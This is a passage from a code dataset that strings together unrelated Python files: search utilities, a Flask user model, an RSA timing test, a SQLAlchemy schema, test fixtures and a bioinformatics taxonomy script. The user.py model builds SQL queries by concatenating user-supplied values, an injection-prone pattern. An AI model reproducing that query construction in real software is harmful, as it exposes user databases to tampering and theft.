[index1,index2]\n","sub_path":"001_Two_Sum.py","file_name":"001_Two_Sum.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"347421402","text":"\n\ndef binary_search(arr, item):\n\tleft = 0\n\tright = len(arr) - 1\n\n\twhile(left <= right):\n\t\tmiddle = (right + left) // 2\n\n\t\tif arr[middle] == item:\n\t\t\treturn middle\n\t\telif arr[middle] < item:\n\t\t\tleft = middle + 1\n\t\telif arr[middle] > item:\n\t\t\tright = middle - 1\n\n\treturn -1\n\n\ndef run():\n\tarr = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\n\tfor i in range(9):\n\t\tprint(binary_search(arr, i + 1))\n\n\nif __name__ == \"__main__\":\n\trun()\n","sub_path":"semana_03/gfg/02_BinarySearch.py","file_name":"02_BinarySearch.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"412193749","text":"from flask_login import UserMixin\r\nfrom sqlalchemy import create_engine \r\nimport os\r\n\r\n\r\n################################################################\r\n\r\ndef get_db():\r\n\tdb=None\r\n\ttry:\r\n\t\tdatabase_url = os.environ['DATABASE_URL']\r\n\t\tdb = create_engine(database_url)\r\n\t\treturn db\r\n\texcept Exception as e:\r\n\t\tprint(\"Error. Database not accessible: \"+str(e))\r\n\t\treturn None\r\n\r\nDATABASE_CURSOR = get_db()\r\nif DATABASE_CURSOR == None:\r\n\tprint(\"DataBase == NONE. 
Database not accessible\")\r\nelse:\r\n\tprint(\"DataBase conected for user setup*******\")\r\n\r\n################################################################\r\n\r\nclass User(UserMixin):\r\n\tdef __init__(self, id_, name, email, profile_pic,faculdade='', curso='', numberfiles='', files='', numbercoments='', coments='', numberiteration='', iteration='', numberbookmarks='', bookmarks='', numberfriends='', friends='', misc='', extra=''):\r\n\t\tself.id = id_\r\n\t\tself.name = name\r\n\t\tself.email = email\r\n\t\tself.profile_pic = profile_pic\r\n\t\tself.faculdade = faculdade\r\n\t\tself.curso = curso\r\n\t\tself.numberfiles = numberfiles\r\n\t\tself.files = files\r\n\t\tself.numbercoments = numbercoments\r\n\t\tself.coments = coments\r\n\t\tself.numberiteration = numberiteration\r\n\t\tself.iteration = iteration\r\n\t\tself.numberbookmarks = numberbookmarks\r\n\t\tself.bookmarks = bookmarks\r\n\t\tself.numberfriends = numberfriends\r\n\t\tself.friends = friends\r\n\t\tself.misc = misc\r\n\t\tself.extra = extra\r\n\r\n\t@staticmethod\r\n\tdef get(user_id):\r\n\t\tDATABASE_CURSOR = get_db()\r\n\t\tcur=DATABASE_CURSOR\r\n\t\tTABLE=os.environ['DATABASE_TABLE_USERS']\r\n\t\tcontent = \"SELECT * FROM \"+TABLE+\" WHERE id = '\"+str(user_id)+\"'\"\r\n\t\tuser = cur.execute(content).fetchone()\r\n\r\n\t\tif not user:\r\n\t\t\treturn None\r\n\r\n\t\tuser = User(\r\n\t\t\tid_ = user[0], \r\n\t\t\tname = user[1],\r\n\t\t\temail = user[2],\r\n\t\t\tprofile_pic = user[3],\r\n\t\t\tfaculdade = user[4],\r\n\t\t\tcurso = user[5],\r\n\t\t\tnumberfiles = user[6],\r\n\t\t\tfiles = user[7],\r\n\t\t\tnumbercoments = user[8],\r\n\t\t\tcoments = user[9],\r\n\t\t\tnumberiteration = user[10],\r\n\t\t\titeration = user[11],\r\n\t\t\tnumberbookmarks = user[12],\r\n\t\t\tbookmarks = user[13],\r\n\t\t\tnumberfriends = user[14],\r\n\t\t\tfriends = user[15],\r\n\t\t\tmisc = user[16],\r\n\t\t\textra = user[17],\r\n\t\t)\r\n\t\treturn user\r\n\r\n\t@staticmethod\r\n\tdef create(id_, name, email, profile_pic):\r\n\t\tDATABASE_CURSOR = get_db()\r\n\t\tcur=DATABASE_CURSOR\r\n\t\tTABLE=os.environ['DATABASE_TABLE_USERS']\r\n\t\tcontent = \"INSERT INTO \"+TABLE+\" VALUES('\"+str(id_)+\"','\"+str(name)+\"','\"+str(email)+\"','\"+str(profile_pic)+\"');\"\r\n\t\tcur.execute(content)\r\n","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"304104143","text":"import rsa\nimport time\n\n\nimport Crypto\nfrom Crypto.Cipher import PKCS1_OAEP\nfrom Crypto.PublicKey import RSA\nfrom Crypto import Random\nimport base64\n\ndef enc_PyRSA():\n \n start = time.time()\n\n (pub,priv) = rsa.newkeys(2048,poolsize=2)\n\n end = time.time()\n print(\"runtime:\"+str(end - start))\n return(end-start)\n\ndef enc_Pycryptodome():\n start = time.time()\n rand = Random.new().read\n key = RSA.generate(2048,rand)\n mid = time.time()\n print(\"key gen time:\"+str(mid - start)+\" seconds\")\n return(mid-start)\n\n\ndef run():\n total = 0\n print(\"---- pyRSA ----\")\n for i in range(0,10):\n f = enc_PyRSA()\n total = total + f\n\n print(\"pyRSA avg:\" + str(total/10))\n print(\"----Pycryptodome----\")\n total = 0\n for i in range(0,10):\n f = enc_Pycryptodome()\n total = total + f\n\n print(\"pyCryptodome avg:\" + str(total/10))\n\n \n","sub_path":"Proof of 
concept/RSA_Test2.py","file_name":"RSA_Test2.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"259572271","text":"from datetime import date as pydate\nfrom random import choice\nimport os\nimport sys\nfrom sqlalchemy import (Boolean, Column, Date, DateTime, ForeignKey, Index,\n Integer, LargeBinary, MetaData, String, Table,\n UniqueConstraint, engine, Text)\nfrom sqlalchemy.engine import Engine\nfrom sqlalchemy.sql import (Select, between, delete, desc, distinct, insert,\n join, select, update)\nfrom sqlalchemy.sql import func\nfrom sqlalchemy import CheckConstraint\nimport logging\nclass data():\n def __init__(self, used_engine: engine, create= True, log_format=None):\n \"\"\"Initiliaze data class. If engine is not provided tables are not set (call set_tables later)\n\n Arguments:\n used_engine {engine} -- [sqlalchemy engine]\n\n Keyword Arguments:\n create {bool} -- [If given will also insure tables exists, as well attempt to insert user roles] (default: {True})\n \"\"\"\n \n if not log_format:\n log_format = logging.Formatter(\"[%(asctime)s] %(levelname)s in %(funcName)-20s - %(thread)d: %(message)s\")\n\n logger = logging.getLogger(__name__)\n logger.handlers.clear()\n logger.setLevel(logging.INFO)\n handler = logging.StreamHandler()\n handler.setFormatter(log_format)\n logger.addHandler(handler)\n logger.propagate = False\n self.logger=logger\n self.logger.debug(\"Logger set up\")\n\n\n if used_engine is not None:\n self.set_tables(used_engine, create=create)\n else:\n self.engine=None\n\n\n def set_tables(self, used_engine: engine, create= True):\n \"\"\"set object tables\n\n Arguments:\n used_engine {engine} -- [sqlalchemy engine]\n\n Keyword Arguments:\n create {bool} -- [If given will also insure tables exists, as well attempt to insert user roles] (default: {True}] (default: {True})\n \"\"\"\n self.logger.info(\"defining tables\")\n \n if not os.environ.get(\"HEROKU\"):\n # sqlite doesn't enforce foreign keys by default, turning them on to enforce cascade\n def _fk_pragma_on_connect(dbapi_con, con_record):\n dbapi_con.execute('pragma foreign_keys=ON')\n\n from sqlalchemy import event\n event.listen(used_engine, 'connect', _fk_pragma_on_connect)\n\n metadata = MetaData(bind=used_engine)\n self.account = Table('account', metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"role_id\", Integer, ForeignKey(\n \"role.id\", ondelete=\"CASCADE\"), nullable=False),\n Column(\"creation date\", DateTime, nullable=False,\n server_default=func.now()),\n Column(\"username\", String(144), nullable=False),\n Column(\"salt\", String(144), nullable=False),\n Column(\"password\", String(144), nullable=False),\n Column(\"first_name\", String(144), nullable=False),\n Column(\"last_name\", String(144), nullable=False),\n UniqueConstraint(\n 'username', name='username_unique')\n )\n self.role = Table(\"role\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", String(20), nullable=False),\n UniqueConstraint('name', name='role_unique'\n ))\n\n self.course = Table(\"course\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"teacher_id\", Integer, ForeignKey(\n \"account.id\", ondelete=\"CASCADE\"), index=True, nullable=False),\n Column(\"name\", String(144), nullable=False),\n Column(\"description\", String(144)),\n Column(\"code\", String(8), nullable=False),\n Column(\"end_date\", Date),\n Column(\"creation_date\", DateTime, nullable=False,\n 
server_default=func.now())\n )\n self.course_student = Table(\"course_student\", metadata,\n Column(\"student_id\", Integer, ForeignKey(\n \"account.id\", ondelete=\"CASCADE\"),nullable=False, primary_key=True),\n Column(\"course_id\", Integer, ForeignKey(\n \"course.id\", ondelete=\"CASCADE\"),nullable=False, primary_key=True)\n )\n\n self.assignment = Table(\"assignment\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", String(500), nullable=False),\n Column(\"course_id\", Integer, ForeignKey(\n \"course.id\", ondelete=\"CASCADE\"), nullable=False),\n Column(\"reveal\", DateTime,\n server_default=func.now(), nullable=False),\n Column(\"deadline\", DateTime)\n )\n\n self.task = Table(\"task\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"number\", Integer, nullable=False),\n Column(\"points\", Integer, nullable=False),\n Column(\"description\", String(500)),\n Column(\"assignment_id\", Integer, ForeignKey(\n \"assignment.id\", ondelete=\"CASCADE\"), nullable=False)\n )\n\n self.file = Table(\"file\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", String(), nullable=False),\n Column(\"owner_id\", Integer, ForeignKey(\"account.id\", ondelete=\"CASCADE\"),nullable=False),\n Column(\"upload_date\", DateTime, nullable=False, server_default=func.now()),\n Column(\"binary_file\", LargeBinary()),\n Column(\"submit_id\", Integer, ForeignKey(\n \"submit.id\", ondelete=\"CASCADE\"), index=True),\n Column(\"answer_id\", Integer, ForeignKey(\n \"answer.id\", ondelete=\"CASCADE\"), index=True),\n Column(\"task_id\", Integer, ForeignKey(\n \"task.id\", ondelete=\"CASCADE\"), index=True),\n Column(\"feedback_id\", Integer, ForeignKey(\n \"feedback.id\", ondelete=\"CASCADE\"), index=True),\n Column(\"assignment_id\", Integer, ForeignKey(\n \"assignment.id\", ondelete=\"CASCADE\"), index=True),\n CheckConstraint(\"\"\"\n (CASE WHEN answer_id IS NULL THEN 0 ELSE 1 END + \n CASE WHEN submit_id IS NULL THEN 0 ELSE 1 END + \n CASE WHEN task_id IS NULL THEN 0 ELSE 1 END + \n CASE WHEN feedback_id IS NULL THEN 0 ELSE 1 END +\n CASE WHEN assignment_id IS NULL THEN 0 ELSE 1 END) \n = 1\"\"\", name='null file foreign keys')\n \n \n )\n \n\n self.answer = Table(\"answer\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"reveal\", DateTime,\n server_default=func.now(), nullable=False),\n Column(\"description\", String(500)), \n Column(\"task_id\", Integer, ForeignKey(\n \"task.id\", ondelete=\"CASCADE\"), unique=True, nullable=False),\n Column(\"reveal\", DateTime, nullable=False))\n\n self.submit = Table(\"submit\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"description\", String(500)),\n Column(\"task_id\", Integer, ForeignKey(\"task.id\", ondelete=\"CASCADE\"), index=True,nullable=False),\n \n Column(\"last_update\", DateTime, nullable=False, server_default=func.now()), \n \n Column(\"owner_id\", Integer, ForeignKey(\"account.id\", ondelete=\"CASCADE\"), index=True,nullable=False))\n\n self.feedback = Table(\"feedback\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"points\", Integer, nullable=False),\n Column(\"timestamp\", DateTime, nullable=False, server_default=func.now()),\n Column(\"modified\", DateTime),\n Column(\"description\", String(500)),\n Column(\"owner_id\", Integer, ForeignKey(\n \"account.id\"), nullable=False),\n Column(\"visible\", Boolean, nullable=False),\n Column(\"submit_id\", Integer, ForeignKey(\"submit.id\", ondelete=\"CASCADE\"), 
index=True,nullable=False))\n \n\n self.comment = Table(\"comment\", metadata,\n \n Column(\"id\", Integer, primary_key=True),\n Column(\"text\", Text),\n Column(\"modified\", DateTime),\n Column(\"user_id\", Integer, ForeignKey(\n \"account.id\"), nullable=False),\n Column(\"visible\", Boolean, nullable=False),\n Column(\"timestamp\", DateTime, nullable=False, server_default=func.now()),\n Column(\"submit_id\", Integer, ForeignKey(\n \"submit.id\", ondelete=\"CASCADE\"), index=True),\n Column(\"answer_id\", Integer, ForeignKey(\n \"answer.id\", ondelete=\"CASCADE\"), index=True),\n Column(\"task_id\", Integer, ForeignKey(\n \"task.id\", ondelete=\"CASCADE\"), index=True),\n Column(\"assignment_id\", Integer, ForeignKey(\n \"assignment.id\", ondelete=\"CASCADE\"), index=True),\n Column(\"feedback_id\", Integer, ForeignKey(\n \"feedback.id\", ondelete=\"CASCADE\"), index=True),\n CheckConstraint(\"\"\"\n (CASE WHEN answer_id IS NULL THEN 0 ELSE 1 END + \n CASE WHEN submit_id IS NULL THEN 0 ELSE 1 END + \n CASE WHEN task_id IS NULL THEN 0 ELSE 1 END + \n CASE WHEN feedback_id IS NULL THEN 0 ELSE 1 END +\n CASE WHEN assignment_id IS NULL THEN 0 ELSE 1 END) \n = 1\"\"\", name='null comment foreign keys')\n \n )\n\n self.peer = Table(\"peer\", metadata,\n Column(\"submit_id\", Integer, ForeignKey(\"submit.id\", ondelete=\"CASCADE\"), index=True,nullable=False),\n \n Column(\"reciever_id\", Integer, ForeignKey(\"account.id\", ondelete=\"CASCADE\"), index=True,nullable=False),\n Column(\"reviewer_id\", Integer, ForeignKey(\"account.id\", ondelete=\"CASCADE\"), index=True,nullable=False),\n Column(\"review\", String(500), nullable=False),\n Column(\"deadline\", DateTime, nullable=False),\n Column(\"teacher_check\", Boolean, default = False)\n \n \n )\n self.file_log= Table(\"file_log\", metadata,\n Column(\"type\", String(50), nullable=False),\n Column(\"file_id\", Integer, ForeignKey(\n \"file.id\", ondelete=\"CASCADE\"),index=True, nullable=False),\n Column(\"user_id\", Integer, ForeignKey(\n \"account.id\"), nullable=False),\n Column(\"timestamp\", DateTime, nullable=False, server_default=func.now()),\n \n\n \n )\n\n\n self.engine=used_engine\n if create:\n self.logger.info(\"attempting create all\")\n metadata.create_all() # checks if table exsists first\n\n # insert 1 admin user, and roles \"USER\" and \"ADMIN to the database (if they don't exsist)\"\n\n with self.engine.connect() as conn:\n sql=self.role.insert().values(name = \"USER\", id = 1)\n\n # catches unqiue contraint fail\n try:\n\n conn.execute(sql)\n self.logger.info(\"user role inserted\")\n except:\n pass\n sql=self.role.insert().values(name = \"ADMIN\", id = 2)\n try:\n conn.execute(sql)\n self.logger.info(\"admin role inserted\")\n\n except:\n pass\n\n sql=self.role.insert().values(name = \"TEACHER\", id = 3)\n try:\n conn.execute(sql)\n self.logger.info(\"admin role inserted\")\n\n except:\n pass\n\n\n @staticmethod\n def drop_all(engine, tables=None):\n print(\"DROPPING TABLES\")\n meta = MetaData(bind=engine)\n meta.reflect(only=tables)\n if tables:\n raise NotImplementedError(\"TODO\")\n meta.drop_all()\n\n\n from ._user_service import delete_user, get_user_by_id, check_user, update_username\n from ._user_auth import get_user, hash_password, insert_user, update_password, get_role_id\n from ._course_service import insert_course, select_courses_teacher, select_courses_student, enlist_student, select_students, select_course_details, set_assignments\n from ._assignment_service import insert_assignment, insert_task, 
select_assignment, set_submits\n from ._file_service import select_file_details, get_file, update_file, insert_file_log, insert_files, check_user_view_rights, check_user_delete_rights\n from ._submit_service import update_submit, select_submits, get_simple_submit\n from ._teacher_stats import count_students\n from ._task_service import set_task_answer, update_answer\n from ._overview_service import get_all_submits, get_course_task_stats, get_first_downloads\n from ._view_rights import check_access_rights\n from ._feedback_service import update_feedback, grade_submit, delete_feedback, insert_feedback, select_feedback\n from ._comment_service import insert_comment,select_comments, update_comment, insert_comment_dict","sub_path":"application/database/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":13914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"181171852","text":"\"\"\"Ironic test utilities.\"\"\"\n\nfrom ironic import test\nfrom ironic.openstack.common import jsonutils as json\nfrom ironic.db.sqlalchemy import models\n\n\ndef get_test_node(**kw):\n power_info = json.dumps({'driver': 'ipmi',\n 'user': 'fake-user', \n 'password': 'fake-password',\n 'address': 'fake-address'})\n node = models.Node()\n node.id = kw.get('id', 123)\n node.uuid = kw.get('uuid', '1be26c0b-03f2-4d2e-ae87-c02d7f33c123')\n node.cpu_arch = kw.get('cpu_arch', 'x86_64')\n node.cpu_num = kw.get('cpu_num', 4)\n node.local_storage_max = kw.get('local_storage_max', 1000)\n node.task_state = kw.get('task_state', 'NOSTATE')\n node.image_path = kw.get('image_path', '/fake/image/path')\n node.instance_uuid = kw.get('instance_uuid',\n '8227348d-5f1d-4488-aad1-7c92b2d42504')\n node.instance_name = kw.get('instance_name', 'fake-image-name')\n node.power_info = kw.get('power_info', power_info)\n node.extra = kw.get('extra', '{}')\n\n return node\n\ndef get_test_iface(**kw):\n iface = models.Iface()\n iface.id = kw.get('id', 987)\n iface.node_id = kw.get('node_id', 123)\n iface.address = kw.get('address', '52:54:00:cf:2d:31')\n\n return iface\n","sub_path":"ironic/tests/db/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"567692612","text":"from natspec_utils.stringutils import stringToUnicode as u;\n\nfrom django.test.testcases import TestCase\nfrom cuescience_cart.tests.support.support import TestSupport\n\n\n\n\nclass TestJustPostAllowed(TestCase):\n def setUp(self):\n self.test_support = TestSupport(self)\n\n def test(self):\n \"\"\"\n The code in this method is generated from: /de.iljabauer.projects.natspec.python/cuescience_cart/tests/views/test_just_post_allowed.natspec\n Never change this method or any contents of this file, all local changes will we overwritten.\n \"\"\"\n # Send get to /cart/add/1/\n response__cart_add_1_ = self.test_support.send_get_to_url(u(\"/cart/add/1/\"))\n \n # Assert status code: 405\n self.test_support.assert_status_code(405, response__cart_add_1_)\n \n # Send get to /cart/remove/1/\n response__cart_remove_1_ = self.test_support.send_get_to_url(u(\"/cart/remove/1/\"))\n \n # Assert status code: 405\n self.test_support.assert_status_code(405, response__cart_remove_1_)\n \n # Send get to /cart/update/\n response__cart_update_ = self.test_support.send_get_to_url(u(\"/cart/update/\"))\n \n # Assert status code: 405\n self.test_support.assert_status_code(405, response__cart_update_)\n \n 
","sub_path":"cuescience_cart/tests/views/test_just_post_allowed.py","file_name":"test_just_post_allowed.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"468154291","text":"import pandas as pd\nimport numpy as np\nimport itertools\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n\nindata = pd.read_csv('inputs/Combined_GreenLake_seqs.csv')\ntestdat= pd.read_csv('inputs/testset.csv')\ntestdat2= pd.read_csv('inputs/testset2.csv')\ntestdat3= pd.read_csv('inputs/TESTSET3.csv')\n\nall_seqs_tot=indata['Seq Count'].sum(axis=0) #total of all sequences\n\nwnthders=['OTU rep sequence ID', 'taxonomy', 'seq']\nnms=['k__Bacteria', 'k__Archaea','c__Epsilonproteobacteria','c__Gammaproteobacteria','c__Alphaproteobacteria','p__SAR406','o__Rhodobacterales','p__ZB3', 'p__SR1']\n\n# Output should look like: >OTU ID taxonomy seq full fasta file (all sequences)\n\nseqs_to_strip = ['k__', 'p__','c__','o__;','f__;','g__;','o__','f__','g__','s__','[',']']\n\n#set up taxonomy classification with indices and abbrev. keys\ntaxonomy_levels=pd.DataFrame(columns=['level','key'])\ntaxonomy_levels['level']=['kingdom', 'phylum', 'class', 'order', 'family', 'genus', 'species']\ntaxonomy_levels['key']= ['k__','p__','c__','o__','f__','g__','s__']\n\n\ndef strip_text(string):\n for seq in seqs_to_strip:\n string = string.replace(seq,'')\n string = string.replace('; ',';')\n string = string.strip()\n string = string + ';'\n string = string.replace(';;',';')\n string=string.rstrip(';')\n return string\n\ndef basic_strip(string,seqs):\n for seq in seqs:\n string = string.replace(seq,'')\n return string\n\ndef subst_ind(sb1,sb2,defau,string):\n try:\n ind1=string.index(sb1)+len(sb1)\n ind2=string.index(sb2)\n if(ind1 != ind2): #if c__ is not empty\n return string[ind1:ind2]\n else:\n return defau\n except ValueError: #if c__ does not exist\n return defau\n\ndef multi_str(string,sublist):\n vals=[]\n for x in sublist:\n val=string.find(x)\n vals.append(val)\n if any(val >= 0 for val in vals):\n return True\n else:\n return False\n\ndef phyl_subst_ind(sb1,sb2,tax_lev,string):\n# print('----------')\n# print('tax lev is',tax_lev)\n# print('string',string)\n tax_indup=(taxonomy_levels.loc[taxonomy_levels.level==tax_lev].index-1)[0] #gets index of tax. one level above your tax. of interest\n tax_up=taxonomy_levels.key.iloc[tax_indup] #retrieves associated string abbrev.\n# print('tax up',tax_up)\n\n unclassend='; '+sb1[0] #ending would be '; ' + whatever your first substring passed in was\n# print('unclassend', unclassend)\n\n try:\n ind1=string.index(sb1)+len(sb1) #for example, if phylum, starts after p__\n ind2=string.index(sb2) #for example, if phylum, this is ; c__\n if(ind1 != ind2): #if level__ is not empty (if nothing was in between they'd be in the same spot)\n# print('if case')\n# print('returning',string[ind1:ind2])\n return string[ind1:ind2] #return what is in between them\n\n else:\n# print('else case')\n# print('returning',string[string.rfind('__',0,string.index(unclassend))],'through',string[string.index(unclassend)],'unclass. '+string[string.rfind('__',0,string.index(unclassend))+2:string.index(unclassend)])\n return 'unclass. '+string[string.rfind('__',0,string.index(unclassend))+2:string.index(unclassend)] # level__ is there but empty; Level above is not empty. 
For example: p__; c__ is there for phylum, this would be from the end of k__ and k__bacteria is there.\n\n\n except ValueError: #if ind2 is not there (so if you are looking for phylum, there is no ; p in this case to use as index\n# print('val error case')\n\n lstind=(taxonomy_levels.loc[taxonomy_levels.level==tax_lev].index)[0] #index to start a lst from taxonomic level of interest\n newtaxlst=taxonomy_levels['key'][:lstind] #the lst\n# print('new tax list', newtaxlst)\n newtaxlst.reset_index(drop = True, inplace = True) #reset indexing incase it got weird in dataframe\n# print('rest inds new tax list',newtaxlst)\n for i in reversed(newtaxlst): #starting at taxonomic level of interest, go in reverse order taxonomically, go back to higher levels\n key=i\n# print('key',key, 'index', string.find(key))\n if string.find(key)!=-1: #if its there (note- string.find will return -1 if it cant find substr, .index returns val error\n revInd=string.index(key)+len(key) #because index starts at beginning of key, add length of key\n# print('revInd',revInd)\n# print('returning unclass. ',string[string.rfind('__',0,revInd)+2:revInd]) #as with key, need to add length of substring to omit\n# print('----------')\n return 'unclass. '+string[string.rfind('__',0,revInd)+2:revInd]\n break\n\n\ndef fasta_out(dat,hds,cats=None,of='outputs',copof='pa_inputs', wantcop=False): #feed in master data file, fasta headers, and cats (what you are sorting for)\n indata3=dat.copy()\n if cats==None: #if you don't want to sort...convert entire file to fasta format and save\n indata2 = dat.copy()\n indata2['taxonomy'] = indata2['taxonomy'].map(lambda x: strip_text(x)) #strip unwanted chars for FASTA\n np.savetxt(of+'/fasta_GreenLake_all_seqs.fasta', indata[hds].values, fmt='%s|%s\\n%s') #FASTA format\n else:\n d = {name:dat for name in cats} #dictionary associates a name with each cateogry in dataframe\n for name, dat in d.items():\n# print('function name1', name)\n name2=strip_text(name) #name2 is used for output(strips away KPSOFGS class.)\n# print('name2',name2)\n name2dat=dat.loc[dat.taxonomy.str.contains(name, na=False)] #find all occurences of category\n name2dat.to_csv(of+'/fasta_GreenLake_'+name2+'_seqs.csv', index=False) #save csv version\n \n if wantcop==True:\n name2dat.to_csv(copof+'/fasta_GreenLake_'+name2+'_seqs.csv', index=False) #save copy to pa input\n \n name2dat['taxonomy'] = name2dat['taxonomy'].map(lambda x: strip_text(x)) #strip unwanted chars for FASTA\n np.savetxt(of+'/fasta_GreenLake_'+name2+'_seqs.fasta', name2dat[hds].values, fmt='%s|%s\\n%s') #FASTA format\n\n indata3['bools'] = indata3.taxonomy.map(lambda x: multi_str(x, cats)) #boolean index all data- False means didn't fall into any cat.\n indata3=indata3.loc[indata3.bools.values==False] #find where boolean index is False and make that the dataframe\n indata3.drop('bools',1,inplace=True)\n indata3.to_csv(of+'/fasta_GreenLake_unassigned_seqs.csv', index=False) #save csv version\n indata3['taxonomy'] = indata3['taxonomy'].map(lambda x: strip_text(x)) #strip unwanted chars for FASTA\n np.savetxt(of+'/fasta_GreenLake_unassigned_seqs.fasta', indata3[hds].values, fmt='%s|%s\\n%s') #FASTA format\n\n\ndef list_loader(dat,tax_lev,of='outputs',nm='',ks='b',outf=True):\n ct=pd.DataFrame(columns=[tax_lev,'total']) #set up an empty dataframe; note: only define columns you append to while empty\n print(ct) #otherwise define during calculation\n seqs=['[',']']\n \n tax_indup=(taxonomy_levels.loc[taxonomy_levels.level==tax_lev].index-1)[0] #find index of tax. 
level 1 above yours\n tax_up=taxonomy_levels.level.iloc[tax_indup] #retreive string\n \n key1=taxonomy_levels.loc[taxonomy_levels.level==tax_lev].key.values[0] #key 1 is substring 1 (tax. level before name) (key is the abbrev.)\n #######\n #set up for substring two (where your taxonomic name of interest ends)\n downind=(taxonomy_levels.loc[taxonomy_levels.level==tax_lev].index+1)[0] #gets index of your tax level of interest and goes down one\n key2=taxonomy_levels.key.iloc[downind] #retrieves actual text taxonomic level from indexed location\n #######\n dat['Subs']=dat.taxonomy.map(lambda x: phyl_subst_ind(key1,'; '+key2,tax_lev,x)) #find all phyla\n dat['Subs']=dat.Subs.map(lambda x: basic_strip(x,seqs))\n\n sort_lst=dat.Subs.unique() #unique phyla\n for thing in sort_lst:\n ctdat=dat.loc[dat.Subs==thing] #find all occurences of category\n counts=ctdat['Seq Count'].values\n tot=np.sum(counts)\n ct = ct.append(pd.DataFrame([[thing,tot]],columns=[tax_lev,'total']))\n ct.reset_index(drop=True,inplace=True) #ct.append does now allow reindexing, so this modifies indices\n dat.drop('Subs',1,inplace=True)\n ta=ct['total'].sum(axis=0)\n ct['tax. depth int. ra']=ct['total'].apply(lambda x:x/ta) #depth integrated relative abundance at taxonomic level\n print(ct)\n if ks=='b':\n ct['king. depth int ra']=ct['total'].apply(lambda x:x/bact_tot)\n elif ks=='a':\n ct['king. depth int ra']=ct['total'].apply(lambda x:x/arch_tot)\n if outf==True:\n ct.to_csv(of+'/GreenLake_'+tax_up+nm+'counts.csv', index=False) #save csv version\n print(ct)\n return sort_lst, ct\n\ndef tax_hist(ctdat, of='outputs',nm=''):\n\n tax_lev=ctdat.columns.values[0]\n hdlst=[tax_lev,ctdat.columns.values[ctdat.columns.get_loc('total')]]\n #finds headers for appropriate taxonomic column and total column\n print('hdlist',hdlst)\n taxdat=ctdat[hdlst]\n tax_indup=(taxonomy_levels.loc[taxonomy_levels.level==tax_lev].index-1)[0] #find index of tax. 
level 1 above yours\n tax_up=taxonomy_levels.level.iloc[tax_indup] #retreive string\n \n ax1 = taxdat.plot(x=tax_lev,kind='bar', edgecolor='black',legend=False)\n\n for tick in ax1.yaxis.get_major_ticks():\n tick.label.set_fontsize(10)\n for tick in ax1.xaxis.get_major_ticks():\n tick.label.set_fontsize(6)\n\n plt.xlabel(tax_lev, fontsize=14)\n plt.ylabel('Counts')\n plt.yscale('log')\n plt.title('Fayetteville Green Lake taxa: '+tax_up+' '+nm, fontsize=14)\n\n rects = ax1.patches\n labels = taxdat['total']\n\n for rect, label in zip(rects, labels):\n height = rect.get_height()\n ax1.text(rect.get_x() + rect.get_width()/2, height + 2.3**(np.log(label)-1), label, fontsize=5,fontweight='bold',color='r',ha='center', va='bottom', rotation=90)\n\n ax1.set_ylim((ax1.get_ylim()[0],ax1.get_ylim()[1]*3.5))\n plt.tight_layout()\n\n plt.savefig(of+'/'+tax_up+nm+'hist.pdf')\n plt.close()\n\ndef find_sum(dat,name):\n name2=strip_text(name) #name2 is used for output(strips away KPSOFGS class.)\n# print('name2',name2)\n name2dat=dat.loc[dat.taxonomy.str.contains(name, na=False)] #find all occurences of category\n tot=name2dat['Seq Count'].sum(axis=0)\n return tot\n\ndef pcnt_community(dat,num,den):\n num_tot=find_sum(dat,num)\n den_tot=find_sum(dat,den)\n pcnt = num_tot/den_tot*100\n return pcnt\n\n\ndef tax_range(tax_lev1='phylum', tax_lev2='genus'): #default settings: from phlyum through genus (not species b/c at that level nothing to further classify\n tax_ind1=(taxonomy_levels.loc[taxonomy_levels.level==tax_lev1].index)[0]\n tax_ind2=(taxonomy_levels.loc[taxonomy_levels.level==tax_lev2].index)[0]\n\n return tax_ind1,tax_ind2\n\ndef probe_base_reform(dat,of='outputs'): #for this function, use csv reader WITHOUT headers to load. for files that are messed up with mismatch columns separated into 2\n droplst=[]\n tempdat=dat.copy()\n filtered_data = tempdat.dropna(axis='columns', how='all') #get rid of columns where all elements = NaN (gets rid of the empty column that always appears after 'probe name' column\n r=np.arange(int(filtered_data.shape[1]/4))\n\n for i in range(1,len(r)):\n col=r[i]*4-1 #starting at 1, go to every 3rd column (i.e., 3, 6, 9, etc.)\n droplst.append(col-1)\n nanBool=pd.isnull(filtered_data.iloc[:,col]) #for each 3rd column, get boolean values (looking for NaN)\n nanInds=nanBool.index[nanBool==True].tolist() #get indexes of rows containing NaN\n for j in range(len(nanInds)):#for each of those indices\n if str(filtered_data.iloc[nanInds[j],col-1]).find('Mismatch')>-1:#if the corresponding row one\n filtered_data.iloc[nanInds[j],col]=filtered_data.iloc[nanInds[j],col-1] #set the column NaN value to the value one column to the left\n\n filtered_data.drop(filtered_data.columns[droplst],axis=1,inplace=True)#refilter, getting rid of the columns with data merged into every 3rd column\n filtered_data.to_csv(of+'/test.csv',index=False)\n\ndef probe_base_sep(dat,probe_props,of='outputs',mms=0):#import csv with header=None\n tempdat=dat.copy()\n 